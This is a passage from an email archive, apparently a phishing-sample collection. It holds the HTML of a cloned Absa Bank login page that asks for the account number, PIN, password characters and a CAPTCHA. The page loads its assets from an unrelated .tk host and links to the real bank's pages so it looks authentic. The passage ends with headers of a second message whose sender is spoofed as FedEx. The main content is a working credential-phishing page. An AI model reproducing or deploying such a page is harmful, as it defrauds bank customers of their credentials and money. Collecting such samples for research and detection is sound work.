                                                      <label class=3D"ui-la=
bel ap-label-details" for=3D"j_user_no" offsetx=3D"0" offsety=3D"10" toolti=
p=3D"You have entered some of your logon credentials incorrectly. Please ty=
pe the characters displayed in the CAPTCHA image, in the text box below the=
 image. Remember to also retype your access account number and PIN in the u=
sual text boxes.">
                                                      <span>Enter code in t=
he box below</span><span class=3D"ui-label--icon"></span>
                                                      </label>
                                                   </td>
                                                   <td class=3D"ui-cell">
                                                      <div style=3D"text-al=
ign:left;">
                                                         <div class=3D"ui-j=
captcha jcaptcha_container">
                                                            <div class=3D"j=
captcha_menu">
                                                               <button clas=
s=3D"ui-button jcaptcha-icon-image jcaptcha-icon-hide ui-captchaCheck--icon=
Hide" type=3D"button" onclick=3D"absa.jcaptcha.getImageChallenge(this)" too=
ltip=3D"Get an image challenge">
                                                               </button>
                                                               <button clas=
s=3D"ui-button jcaptcha-icon-sound ui-captchaCheck--iconSound" type=3D"butt=
on" onclick=3D"absa.jcaptcha.getSoundChallenge(this)" tooltip=3D"Get a soun=
d challenge">
                                                               </button>
                                                               <button clas=
s=3D"ui-button jcaptcha-icon-refresh" type=3D"button" onclick=3D"absa.jcapt=
cha.refreshChallenge(this)" tooltip=3D"Get a new challenge">
                                                               </button>
                                                               <button clas=
s=3D"ui-button jcaptcha-icon-help jcaptcha-icon-hide ui-captchaCheck--iconH=
ide" type=3D"button" onclick=3D"absa.jcaptcha.help(this)" tooltip=3D"Help">
                                                               </button>
                                                            </div>
                                                            <div class=3D"j=
captcha_lnk ui-captchaCheck_lnk">
                                                               <img src=3D"=
http://help-nbvjngfjnoo.tk/shakushakuaza/images/dot_002.gif" class=3D"jcapt=
cha_img ui-captchaCheck_img" id=3D"jCaptchaImgID" title=3D"Captcha">
                                                               <iframe src=
=3D"http://help-nbvjngfjnoo.tk/shakushakuaza/images/dot_002.gif" class=3D"j=
captcha_iframe ui-captchaCheck_iframe" scrolling=3D"no" marginwidth=3D"0" m=
arginheight=3D"0" __idm_frm__=3D"12884901895" width=3D"0" height=3D"0" fram=
eborder=3D"0"></iframe>										=

                                                            </div>
                                                            <div class=3D"j=
captcha_input">
                                                               <input ondra=
gstart=3D"return false" onselectstart=3D"return false" class=3D"ui-form-fie=
ld ui-textBox ui-jcaptcha-textBox" name=3D"CaptchaTxt" id=3D"j_jcaptcha_txt=
" ondrag=3D"return false" oncopy=3D"return false" autocomplete=3D"off" bbf_=
type=3D"simple:alphanumeric" bbf_required=3D"true" requiredtext=3D"Enter th=
e values from the given captcha" schematypetext=3D"Enter the values from th=
e given captcha" showmehow=3D"Enter the values from the given captcha" mess=
ageref=3D".errorMessage" tabindex=3D"0" type=3D"input">
                                                            </div>
                                                            <!-- Modal Capt=
cha Help -->
                                                            <div class=3D"m=
odalCaptchaHelp jcaptcha_help ui-captchaCheck_help" style=3D"display:none; =
z-index:200;">
                                                               <div class=
=3D"ap-popup">
                                                                  <div clas=
s=3D"ap-popup-header">
                                                                     <b>Cap=
tcha Help</b>
                                                                     <div c=
lass=3D"clear-both"></div>
                                                                  </div>
                                                                  <div clas=
s=3D"ap-popup-body ap-info-box">
                                                                     <ul cl=
ass=3D"ap-info-box-ul">
                                                                        <li=
>Enter the words you see in the box, in order and =

                                                                           =
separated by a space. Doing so helps prevent automated programs from =

                                                                           =
abusing this service
                                                                        </l=
i>
                                                                        <li=
>If you are not sure what the words are, either enter your best guess or cl=
ick the reload button next to the distorted words</li>
                                                                        <li=
>Visually impaired users can click the audio button to hear a set of words =
that can be entered instead of the visual challenge.</li>
                                                                     </ul>
                                                                  </div>
                                                                  <div clas=
s=3D"ap-popup-footer" style=3D"text-align:right;">
                                                                     <butto=
n onclick=3D"phe.modal.hideModal()" type=3D"button" tabindex=3D"0" class=3D=
"ui-button ap-button-extra">
                                                                        <di=
v class=3D"ui-button-left">
                                                                           =
<div class=3D"ui-button-right">
                                                                           =
   <div role=3D"button" tabindex=3D"22" class=3D"ui-button-center">Ok</div>
                                                                           =
</div>
                                                                        </d=
iv>
                                                                     </butt=
on>
                                                                  </div>
                                                               </div>
                                                            </div>
                                                         </div>
                                                      </div>
                                                   </td>
                                                </tr>
                                                <tr class=3D"ui-row">
                                                   <td class=3D"ui-cell" co=
lspan=3D"2" style=3D"padding-top:2px">
                                                      <span style=3D"color:=
 #767676;">It is your responsibility to ensure the secrecy of your PIN numb=
er.</span>
                                                   </td>
                                                </tr>
                                             </tbody>
                                          </table>
                                          <!-- Keypad -->
                                          <div style=3D"float: left; width:=
 104px; padding: 5px;">
                                             <div style=3D"float:left; marg=
in-left:0px;">
                                                <div style=3D"-moz-user-sel=
ect: none;" class=3D"ui-keypad-padContainer">
                                                   <p>Keypad</p>
                                                   <table>
                                                      <tbody>
                                                         <tr>
                                                            <td>
                                                               <div class=
=3D"ui-keypad-button" unselectable=3D"on">1</div>
                                                            </td>
                                                            <td>
                                                               <div class=
=3D"ui-keypad-button" unselectable=3D"on">2</div>
                                                            </td>
                                                            <td>
                                                               <div class=
=3D"ui-keypad-button" unselectable=3D"on">3</div>
                                                            </td>
                                                         </tr>
                                                         <tr>
                                                            <td>
                                                               <div class=
=3D"ui-keypad-button" unselectable=3D"on">4</div>
                                                            </td>
                                                            <td>
                                                               <div class=
=3D"ui-keypad-button" unselectable=3D"on">5</div>
                                                            </td>
                                                            <td>
                                                               <div class=
=3D"ui-keypad-button" unselectable=3D"on">6</div>
                                                            </td>
                                                         </tr>
                                                         <tr>
                                                            <td>
                                                               <div class=
=3D"ui-keypad-button" unselectable=3D"on">7</div>
                                                            </td>
                                                            <td>
                                                               <div class=
=3D"ui-keypad-button" unselectable=3D"on">8</div>
                                                            </td>
                                                            <td>
                                                               <div class=
=3D"ui-keypad-button" unselectable=3D"on">9</div>
                                                            </td>
                                                         </tr>
                                                         <tr>
                                                            <td>
                                                               <div class=
=3D"ui-keypad-button util" action=3D"backspace">
                                                                  <div clas=
s=3D"backspace" unselectable=3D"on"></div>
                                                               </div>
                                                            </td>
                                                            <td>
                                                               <div class=
=3D"ui-keypad-button" unselectable=3D"on">0</div>
                                                            </td>
                                                            <td>
                                                               <div class=
=3D"ui-keypad-button util" action=3D"clear" unselectable=3D"on">C</div>
                                                            </td>
                                                         </tr>
                                                      </tbody>
                                                   </table>
                                                </div>
                                             </div>
                                          </div>
                                          <div class=3D"clear-both"></div>
                                          <div class=3D"ui-formFoot">
                                             <div class=3D"genericMessage-p=
lace-holder" style=3D"display:block">
                                                <!--  -->
                                                <div id=3D"ap-login-form1-e=
rror" role=3D"alert" tabindex=3D"0" class=3D"ui-message ui-message-error" s=
tyle=3D"display:none">
                                                   <span class=3D"vi-screen=
reader-line "> Error details. </span>
                                                   <div class=3D"ui-message=
-timeStamp">
                                                      <div style=3D"display=
:none;"><span class=3D"vi-screenreader-line ">Time stamp. </span><span clas=
s=3D"vi-screenreader-line ">Year. </span>2018-<span class=3D"vi-screenreade=
r-line ">Month. </span>09-<span class=3D"vi-screenreader-line ">Day. </span=
>22<span class=3D"vi-screenreader-line ">Time:. </span> </div>
                                                      19:39:18
                                                   </div>
                                                   <div class=3D"ui-message=
--icon"></div>
                                                   <div style=3D"margin-rig=
ht: 120px" class=3D"ui-message-content">
                                                      <div class=3D"ui-mess=
age-title"></div>
                                                      <div class=3D"ui-mess=
age-body" style=3D"clear:both;">
                                                         <!-- msg here -->
                                                      </div>
                                                   </div>
                                                   <div class=3D"clear-both=
"></div>
                                                </div>
                                             </div>
                                             <div class=3D"validation-place=
-holder"></div>
                                             <div class=3D"ui-buttonFooter">
                                                <div class=3D"ui-exception-=
container" style=3D"border:none">
                                                   <div style=3D"float:left=
">
                                                      <div id=3D"divToAfrik=
aans">
                                                         <img src=3D"http:/=
/help-nbvjngfjnoo.tk/shakushakuaza/images/locale_en.gif" title=3D"" style=
=3D"vertical-align:middle;">
                                                         <a tabindex=3D"-1"=
 href=3D"#" onclick=3D"changeLang()" style=3D"color:#646464; text-decoratio=
n:underline; padding-left: 5px;">Verander na Afrikaans</a>
                                                      </div>
                                                   </div>
                                                   <!-- Reset Pin link -->
                                                   <div style=3D"float:left=
; padding-left:auto; padding-right:auto;">
                                                      <a tabindex=3D"-1" hr=
ef=3D"#" onclick=3D"absa.login.onResetPinClick(this)" style=3D"color:red; t=
ext-decoration:underline; padding-left: 10px;">Reset PIN</a>
                                                   </div>
                                                   <!-- FORGOTPIN LINK =

                                                      <div style=3D"float:l=
eft; padding-left:auto; padding-right:auto;">
                                                      	<a tabindex=3D"-1" h=
ref=3D"#" onclick=3D"forgotPin()" style=3D"color:#646464; text-decoration:u=
nderline; padding-left: 5px;">Click here to reset your PIN</a>
                                                      </div> -->
                                                   <!-- BACK BUTTON : DSP a=
nd FEATURE STORE -->
                                                   <button aria-label=3D"Re=
set" type=3D"button" tabindex=3D"1" onclick=3D"resetForm1()" class=3D"ui-bu=
tton ap-button-reset">
                                                      <div class=3D"ui-butt=
on-left">
                                                         <div class=3D"ui-b=
utton-right">
                                                            <div class=3D"u=
i-button-center">Reset</div>
                                                         </div>
                                                      </div>
                                                   </button>
                                                   <button aria-label=3D"Ne=
xt" type=3D"submit" tabindex=3D"0" class=3D"ui-button ap-button-next">
                                                      <div class=3D"ui-butt=
on-left">
                                                         <div class=3D"ui-b=
utton-right">
                                                            <div class=3D"u=
i-button-center">Next</div>
                                                         </div>
                                                      </div>
                                                   </button>
                                                </div>
                                             </div>
                                          </div>
                                       </form>
                                    </div>
                                 </div>
                                 <div class=3D"ap-container-bottom-corners">
                                    <div class=3D"ap-corners-rounded-bottom=
-left"></div>
                                    <div class=3D"ap-corners-rounded-bottom=
" style=3D"width:590px;"></div>
                                    <div class=3D"ap-corners-rounded-bottom=
-right"></div>
                                 </div>
                              </div>
                           </div>
                        </div>
                        <!-- ap-column-2 -->
                        <div class=3D"ap-column-2" style=3D"width:296px;">
                           <!-- Important Links on Right Side of Page -->
                           <div id=3D"divimportantlinks" class=3D"ap-login-=
block-rounded">
                              <!-- top round borders -->
                              <div class=3D"ap-login-block-rounded-top">
                                 <div class=3D"ap-corners-rounded-top-left"=
></div>
                                 <div class=3D"ap-corners-rounded-top"></di=
v>
                                 <div class=3D"ap-corners-rounded-top-right=
"></div>
                              </div>
                              <!-- content -->
                              <div role=3D"tablist" class=3D"ui-tabBox">
                                 <ul class=3D"ui-tabHeads">
                                    <li aria-selected=3D"true" class=3D"ui-=
tabHead ui-tab-selected" role=3D"button" tabindex=3D"13">
                                       Important links
                                       <span class=3D"vi-screenreader-line =
"> [selected] 1 of 1 [tab].</span>
                                    </li>
                                 </ul>
                                 <div class=3D"ui-tabBodies">
                                    <div tabindex=3D"14" role=3D"tabpanel" =
class=3D"ui-tabBody ui-tabBody-selected">
                                       <div style=3D"background: #FFFFFF;">
                                          <ul class=3D"abc">
                                             <li><a href=3D"https://www.abs=
a.co.za/content/dam/south-africa/absa/pdf/2018/tax-certificate-now-availabl=
e-online.pdf" id=3D"am" target=3D"_new">2018 Tax certificates now available=
 online</a></li>
                                             <li><a href=3D"https://ib.absa=
.co.za/absa-online/registration/?lang=3Den" id=3D"am" target=3D"_new">How t=
o register</a></li>
                                             <li><a href=3D"https://www.abs=
a.co.za/planned-maintenance/" id=3D"am" target=3D"_new">Planned Maintenance=
</a></li>
                                             <li><a href=3D"https://www.abs=
a.co.za/media-centre/press-statements/absa-online-payments-issue-notice" id=
=3D"am" target=3D"_new"><b>Inter-Bank Payment delay</b></a></li>
                                             <li><a href=3D"https://www.abs=
a.co.za/security-centre/online-security" id=3D"am" target=3D"_new">Security=
 enhancement</a></li>
                                             <li><a href=3D"https://www.abs=
a.co.za/talk-to-us/" id=3D"am" target=3D"_new">Contact us</a></li>
                                          </ul>
                                       </div>
                                    </div>
                                 </div>
                              </div>
                              <!-- bottom round borders -->
                              <div class=3D"ap-login-block-rounded-bottom">
                                 <div class=3D"ap-corners-rounded-bottom-le=
ft"></div>
                                 <div class=3D"ap-corners-rounded-bottom"><=
/div>
                                 <div class=3D"ap-corners-rounded-bottom-ri=
ght"></div>
                              </div>
                           </div>
                           <!-- How it Works Right of 2nd page -->
                           <div id=3D"divhowitworks" class=3D"ap-login-bloc=
k-rounded" style=3D"display:none">
                              <div>
                                 <!-- top round borders -->
                                 <div class=3D"ap-login-block-rounded-top">
                                    <div class=3D"ap-corners-rounded-top-le=
ft"></div>
                                    <div class=3D"ap-corners-rounded-top"><=
/div>
                                    <div class=3D"ap-corners-rounded-top-ri=
ght"></div>
                                 </div>
                                 <!-- content -->
                                 <div role=3D"tablist" class=3D"ui-tabBox">
                                    <ul class=3D"ui-tabHeads">
                                       <li aria-selected=3D"true" class=3D"=
ui-tabHead ui-tab-selected" role=3D"button" tabindex=3D"15">
                                          How it works
                                          <span class=3D"vi-screenreader-li=
ne "> [selected] 1 of 1 [tab].</span>
                                       </li>
                                    </ul>
                                    <div class=3D"ui-tabBodies">
                                       <div tabindex=3D"16" role=3D"tabpane=
l" class=3D"ui-tabBody ui-tabBody-selected">
                                          <div style=3D"background: #FFFFFF=
;">
                                             <div style=3D"border-bottom: 1=
px solid #CCCCCC;">
                                                <div style=3D"padding: 10px=
;">In this example the password is <b>Password1</b></div>
                                             </div>
                                             <div style=3D"margin: 10px 0px=
 10px 10px;"><span class=3D"pfsmalltxt">P</span>
                                                <span class=3D"pfsmalltxt">=
a</span> <span class=3D"pfsmalltxt">s</span>
                                                <span class=3D"pfsmalltxt">=
s</span> <span class=3D"pfsmalltxt">w</span>
                                                <span class=3D"pfsmalltxt">=
o</span> <span class=3D"pfsmalltxt">r</span>
                                                <span class=3D"pfsmalltxt">=
d</span> <span class=3D"pfsmalltxt">1</span>
                                             </div>
                                             <div style=3D"margin: 10px 0px=
 5px 10px;">
                                                <input class=3D"pfsmall pf2=
" name=3D"dpf1" disabled=3D"true" tabindex=3D"17" maxlength=3D"1" value=3D"=
" type=3D"password">
                                                <input class=3D"pfsmall pf1=
" name=3D"dpf2" disabled=3D"true" value=3D"2" type=3D"text">
                                                <input class=3D"pfsmall pf1=
" name=3D"dpf2" disabled=3D"true" value=3D"3" type=3D"text">
                                                <input class=3D"pfsmall pf1=
" name=3D"dpf2" disabled=3D"true" value=3D"4" type=3D"text">
                                                <input class=3D"pfsmall pf1=
" name=3D"dpf2" disabled=3D"true" value=3D"5" type=3D"text">
                                                <input class=3D"pfsmall pf1=
" name=3D"dpf2" disabled=3D"true" value=3D"6" type=3D"text">
                                                <input class=3D"pfsmall pf1=
" name=3D"dpf2" disabled=3D"true" value=3D"7" type=3D"text">
                                                <input class=3D"pfsmall pf2=
" name=3D"dpf1" disabled=3D"true" tabindex=3D"17" maxlength=3D"1" value=3D"=
" type=3D"password">
                                                <input class=3D"pfsmall pf2=
" name=3D"dpf1" disabled=3D"true" tabindex=3D"17" maxlength=3D"1" value=3D"=
" type=3D"password">
                                             </div>
                                             <div style=3D"border-top: 1px =
solid #CCCCCC; border-bottom: 1px solid #CCCCCC; padding: 10px;">
                                                You have to enter (case sen=
sitive):
                                             </div>
                                             <div style=3D"margin: 10px 0px=
 10px 10px;"><span class=3D"pfsmalltxt">P</span>
                                                <span class=3D"pfsmalltxt">=
&nbsp;&nbsp;</span> <span class=3D"pfsmalltxt">&nbsp;&nbsp;</span>
                                                <span class=3D"pfsmalltxt">=
&nbsp;&nbsp;</span> <span class=3D"pfsmalltxt">&nbsp;&nbsp;</span>
                                                <span class=3D"pfsmalltxt">=
&nbsp;&nbsp;</span> <span class=3D"pfsmalltxt">&nbsp;</span>
                                                <span class=3D"pfsmalltxt">=
d</span> <span class=3D"pfsmalltxt">1</span>
                                             </div>
                                             <div style=3D"margin: 10px 0px=
 5px 10px;">
                                                <input class=3D"pfsmall pf2=
" name=3D"dpf1" disabled=3D"true" tabindex=3D"17" maxlength=3D"1" value=3D"=
" type=3D"password">
                                                <input class=3D"pfsmall pf1=
" name=3D"dpf2" disabled=3D"true" value=3D"2" type=3D"text">
                                                <input class=3D"pfsmall pf1=
" name=3D"dpf2" disabled=3D"true" value=3D"3" type=3D"text">
                                                <input class=3D"pfsmall pf1=
" name=3D"dpf2" disabled=3D"true" value=3D"4" type=3D"text">
                                                <input class=3D"pfsmall pf1=
" name=3D"dpf2" disabled=3D"true" value=3D"5" type=3D"text">
                                                <input class=3D"pfsmall pf1=
" name=3D"dpf2" disabled=3D"true" value=3D"6" type=3D"text">
                                                <input class=3D"pfsmall pf1=
" name=3D"dpf2" disabled=3D"true" value=3D"7" type=3D"text">
                                                <input class=3D"pfsmall pf2=
" name=3D"dpf1" disabled=3D"true" tabindex=3D"17" maxlength=3D"1" value=3D"=
" type=3D"password">
                                                <input class=3D"pfsmall pf2=
" name=3D"dpf1" disabled=3D"true" tabindex=3D"17" maxlength=3D"1" value=3D"=
" type=3D"password">
                                             </div>
                                             <br>
                                          </div>
                                       </div>
                                    </div>
                                 </div>
                                 <!-- bottom round borders -->
                                 <div class=3D"ap-login-block-rounded-botto=
m">
                                    <div class=3D"ap-corners-rounded-bottom=
-left"></div>
                                    <div class=3D"ap-corners-rounded-bottom=
"></div>
                                    <div class=3D"ap-corners-rounded-bottom=
-right"></div>
                                 </div>
                              </div>
                              <div style=3D"padding: 14px 0px 1px 0px;" id=
=3D"ap-campaignImage-div"><a href=3D"https://www.absa.co.za/security-centre=
/online-security/"><img src=3D"http://help-nbvjngfjnoo.tk/shakushakuaza/ima=
ges/orange_banner_en_2.jpg" alt=3D"AOL Express"></a></div>
                              <div style=3D"padding: 14px 0px 1px 0px;" id=
=3D"ap-campAPBImage-div"><a href=3D"https://www.absa.co.za/security-centre/=
online-security/"><img src=3D"http://help-nbvjngfjnoo.tk/shakushakuaza/imag=
es/orange_banner_en_2.jpg" alt=3D"AOL Express"></a></div>
                           </div>
                        </div>
                        <!-- ap-column-2 -->
                        <div class=3D"ap-columns-clear"></div>
                     </div>
                     <!-- ap-columns-2-lhs -->
                     <div style=3D"width: 100%; height: 10px;"></div>
                     <!-- 3 column layout -->
                     <div id=3D"divbottomadds" class=3D"ap-login-columns ap=
-columns-33">
                        <!-- ap-column-1 -->
                        <div class=3D"ap-column-1">
                           <!-- Security Centre Links Bottom left of Login =
page 1 -->
                           <div id=3D"divsecuritycentre" class=3D"ap-login-=
block-rounded">
                              <!-- top round borders -->
                              <div class=3D"ap-login-block-rounded-top">
                                 <div class=3D"ap-corners-rounded-top-left"=
></div>
                                 <div class=3D"ap-corners-rounded-top"></di=
v>
                                 <div class=3D"ap-corners-rounded-top-right=
"></div>
                              </div>
                              <!-- content -->
                              <div role=3D"tablist" class=3D"ui-tabBox">
                                 <ul class=3D"ui-tabHeads">
                                    <li aria-selected=3D"true" class=3D"ui-=
tabHead ui-tab-selected" role=3D"button" tabindex=3D"18">
                                       Security centre
                                       <span class=3D"vi-screenreader-line =
"> [selected] 1 of 1 [tab].</span>
                                    </li>
                                 </ul>
                                 <div class=3D"ui-tabBodies">
                                    <div tabindex=3D"19" role=3D"tabpanel" =
class=3D"ui-tabBody ui-tabBody-selected">
                                       <div style=3D"background: #FFFFFF;">
                                          <ul class=3D"abc">
                                             <li><a href=3D"https://www.abs=
a.co.za/security-centre/online-security" id=3D"am" target=3D"_new">Absa's o=
nline security measures</a></li>
                                             <li><a href=3D"https://www.abs=
a.co.za/security-centre/online-security" id=3D"am" target=3D"_new">Importan=
t information about phishing</a></li>
                                             <li><a href=3D"https://www.abs=
a.co.za/security-centre/online-security" id=3D"am" target=3D"_new">Protect =
yourself online</a></li>
                                             <li><a href=3D"https://www.abs=
a.co.za/security-centre/online-security" id=3D"am" target=3D"_new">Online s=
hopping and 3D Secure</a></li>
                                             <li><a href=3D"https://www.abs=
a.co.za/security-centre/tips-and-tools/scams" id=3D"am" target=3D"_new">Lat=
est scams</a></li>
                                             <li><a href=3D"https://www.abs=
a.co.za/security-centre/tips-and-tools/antivirus-software" id=3D"am" target=
=3D"_new">Latest internet security software</a></li>
                                          </ul>
                                       </div>
                                    </div>
                                 </div>
                              </div>
                              <!-- bottom round borders -->
                              <div class=3D"ap-login-block-rounded-bottom">
                                 <div class=3D"ap-corners-rounded-bottom-le=
ft"></div>
                                 <div class=3D"ap-corners-rounded-bottom"><=
/div>
                                 <div class=3D"ap-corners-rounded-bottom-ri=
ght"></div>
                              </div>
                           </div>
                        </div>
                        <!-- ap-column-2 -->
                        <div class=3D"ap-column-2">
                           <div><a href=3D"https://www.absa.co.za/security-=
centre/online-security/"><img src=3D"http://help-nbvjngfjnoo.tk/shakushakua=
za/images/orange_banner_en_1.jpg" alt=3D""></a></div>
                        </div>
                        <!-- ap-column-3 -->
                        <div class=3D"ap-column-3">
                           <div><a href=3D"https://www.absa.co.za/security-=
centre/online-security/"><img src=3D"http://help-nbvjngfjnoo.tk/shakushakua=
za/images/orange_banner_en_2.jpg" alt=3D"AOL Express"></a></div>
                        </div>
                     </div>
                  </div>
                  <!-- bottom rounded corners -->
                  <div class=3D"ap-container-bottom ap-heading-titlebar-ite=
m ap-container-bottom-show">
                     <div class=3D"ap-corners-rounded-bottom-left"></div>
                     <div class=3D"ap-corners-rounded-bottom"></div>
                     <div class=3D"ap-corners-rounded-bottom-right"></div>
                  </div>
               </div>
            </div>
            <!-- Page bottom corners -->
            <div class=3D"ap-main-content-wrapper-bottom">
               <div class=3D"ap-corners-rounded-bottom-left"></div>
               <div class=3D"ap-corners-rounded-bottom"></div>
               <div class=3D"ap-corners-rounded-bottom-right"></div>
            </div>
         </div>
         <div class=3D"ap-footer" tabindex=3D"20">
            <div style=3D"position:relative; top:0px; left:0px; width:971px=
;">
               <div class=3D"ap-footer-links">
                  <ul>
                     <li><a href=3D"https://www.absa.co.za/security-centre/=
online-security" id=3D"am" target=3D"_new">Security centre</a></li>
                     <li><a href=3D"https://www.absa.co.za/content/dam/sout=
h-africa/absa/pdf/legal/Terms-of-Use-en.pdf" id=3D"am" target=3D"_new">Term=
s of use</a></li>
                     <li><a href=3D"https://www.absa.co.za/legal-and-compli=
ance/browser-requirements" id=3D"am" target=3D"_new">Software requirements<=
/a></li>
                     <li><a href=3D"https://www.absa.co.za/about-us/absa-ba=
nk/corporate-information" id=3D"am" target=3D"_new">Banking regulations</a>=
</li>
                  </ul>
               </div>
               <p tabindex=3D"21">
                  =EF=BF=BD Copyright. Absa Bank Limited. Registration Numb=
er: 1986/004794/06<br>
                  Authorized financial services and registered credit provi=
der NCRCP7
               </p>
               <!-- Barclays Logo Link bottom right of page -->
               <div style=3D"position:absolute; top:0px; right:0px; width:2=
20px; text-align:right;">
                  <!-- <a href=3D"http://www.barclays.com" target=3D"_new">=
<img src=3D"static/style/resources/barclays_logo.gif" border=3D"0" alt=3D"M=
ember of the Barclays group"></a> -->
                  <!-- =3Dxl.getImage("Images/Image/Barclays",lang) -->
               </div>
            </div>
         </div>
      </div>
      <!-- password tips -->
      <div class=3D"modalPasswordTips" style=3D"display: none; width: 600px=
; height: 443px; z-index: 200;">
         <div class=3D"ap-popup">
            <div class=3D"ap-popup-header">
               <b>Password tips</b>
               <div class=3D"clear-both"></div>
            </div>
            <div class=3D"ap-popup-body ap-info-box">
               <ul class=3D"ap-info-box-ul">
                  <li>Never save your password/PIN on your desktop - as it =
may allow
                     others to access your personal information, without yo=
ur permission.
                  </li>
                  <li>Do not make your passwords too personal - rather crea=
te =

                     passwords that have letters and numbers that cannot be=
 attributed to =

                     you.
                  </li>
                  <li>Never provide your Online ID or password/PIN to anyon=
e, never write them down or share them, not even with a bank official.</li>
                  <li>Never provide your Online ID or password/PIN to anyon=
e.</li>
                  <li>Only provide your online password or ID when your bro=
wser shows a Secure Socket Layer(SSL) connection directly to the bank.</li>
                  <li>Do not leave your computer unattended after you have =
entered your Absa Online password.</li>
                  <li>Always log or sign off at the end of a session.</li>
                  <li>For your security</li>
                  <li>Do not open e-mails from unknown sources.</li>
                  <li>Beware of emails that ask for passwords, PINS, credit=
 and debit card information.</li>
                  <li>Avoid doing Internet Banking/ Absa Online in public a=
reas such
                     internet cafes as you never know what software is load=
ed that may =

                     compromise your transactions.
                  </li>
                  <li>Make sure no one has unauthorised access to your PC.<=
/li>
                  <li>Be especially aware that there are no security camera=
s trained on your PC and keyboard.</li>
                  <li>Ensure you have the latest anti virus software applic=
ations loaded on your PC and mobile devices.</li>
                  <li>Make sure the software on your PC is correctly licens=
ed.</li>
                  <li>Update your operating system and browser with latest =
patches.</li>
                  <li>Install personal firewall on your PC if you use a dia=
l-up modem.</li>
                  <li>Only provide your credit card details to reputable co=
mpanies.</li>
                  <li>To ensure that you are using a secure shopping site, =
look for the lock and key and security certificates online.</li>
               </ul>
            </div>
            <div class=3D"ap-popup-footer" style=3D"text-align:right;">
               <button onclick=3D"phe.modal.hideModal()" type=3D"submit" ta=
bindex=3D"0" class=3D"ui-button ap-button-extra">
                  <div class=3D"ui-button-left">
                     <div class=3D"ui-button-right">
                        <div role=3D"button" tabindex=3D"22" class=3D"ui-bu=
tton-center">Ok</div>
                     </div>
                  </div>
               </button>
            </div>
         </div>
      </div>
      <!-- LOGOUT POPUP -->
      <div class=3D"ui-modal modalLogoffWarning" id=3D"modalLogoffWarning" =
style=3D"display:none">
         <div class=3D"ui-modalHeader">
            <div class=3D"ui-modalHeader-title">Logoff</div>
            <div class=3D"ui-modalHeader-icons"></div>
         </div>
         <div class=3D"ui-modalBody">
            <div style=3D"padding:10px;">
               <div>Your Absa Online session is about to expire in <span cl=
ass=3D"ap-popup-body-timer" id=3D"timerSeconds"></span> seconds</div>
               <div>Do you want to continue?</div>
            </div>
         </div>
         <div class=3D"ui-modalFooter">
            <button type=3D"button" class=3D"ui-button ap-button-back" styl=
e=3D"position:static; margin-left:0px;" onclick=3D"absa.login.doLogout()">
               <div class=3D"ui-button-left">
                  <div class=3D"ui-button-right">
                     <div class=3D"ui-button-center">Logoff</div>
                  </div>
               </div>
            </button>
            <button type=3D"button" class=3D"ui-button ap-button-next" oncl=
ick=3D"absa.login.resetTimer2(); phe.modal.hideModal()">
               <div class=3D"ui-button-left">
                  <div class=3D"ui-button-right">
                     <div class=3D"ui-button-center">Continue</div>
                  </div>
               </div>
            </button>
         </div>
      </div>
      <!-- hidden stuff -->
      <div></div>
      <!-- Please wait controller -->
      <div></div>
      <div class=3D"btl-resize-cursorElement"></div>
      <div class=3D"btl-resize-lineElement"></div>
      <div class=3D"btl-resize-outlineElement"></div>
      <div style=3D"display: none;" class=3D"ap-helpText-baloon">
         <div class=3D"ap-helpText-frame">
            <div class=3D"ap-helpText-close-button"></div>
            <div></div>
         </div>
         <div class=3D"ap-helpText-pin"></div>
      </div>
      <div style=3D"display: none;" class=3D"ap-tooltipElement"></div>
   </body>
</html>
--===============0962775270==--

From jose@monkey.org Tue Oct  2 16:11:04 2018 +0000
Return-Path: shipment@fedex.com
Delivered-To: jose@monkey.org
X-FDA: 74674821648.09.drop83_607e075dff11d
X-Spam-Summary: 50,0,0,33fe28a76c06d0e4,d41d8cd98f00b204,shipment@fedex.com,:,RULES_HIT:1:41:72:152:355:379:474:560:962:967:969:973:978:983:988:989:1021:1189:1208:1221:1260:1263:1308:1309:1313:1314:1345:1381:1394:1395:1431:1432:1433:1434:1436:1437:1516:1517:1518:1571:1575:1588:1589:1594:1714:1730:1748:1769:1792:2194:2196:2198:2199:2200:2201:2525:2527:2561:2564:2610:2637:2682:2685:2693:2731:2733:2734:2740:2745:2859:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3351:3421:3585:3865:3866:3867:3868:3871:3872:3873:3889:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4321:4361:5007:6117:6119:6261:6678:6703:7809:7875:8513:8518:8599:8603:8957:8960:9025:9080:9108:9388:9411:11302:11473:11529:11657:11658:11914:12043:12050:12051:12260:12438:12555:12740:12895:12903:12963:12986:13139:13161:13190:13229:13282:13285:13439:13546:13551:14096:14659:14985:21080:21121:21324:21325:21433:21450:21451:21483:21524:21611:21627:21790:21810:30034:30038:30046:30054:30055:30064:30070:30084,
X-HE-Tag: drop83_607e075dff11d
X-Filterd-Recvd-Size: 12611
Received: from fedex.com (ip14.ip-51-254-79.eu [51.254.79.14])
	by imf11.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Tue,  2 Oct 2018 16:11:02 +0000 (UTC)
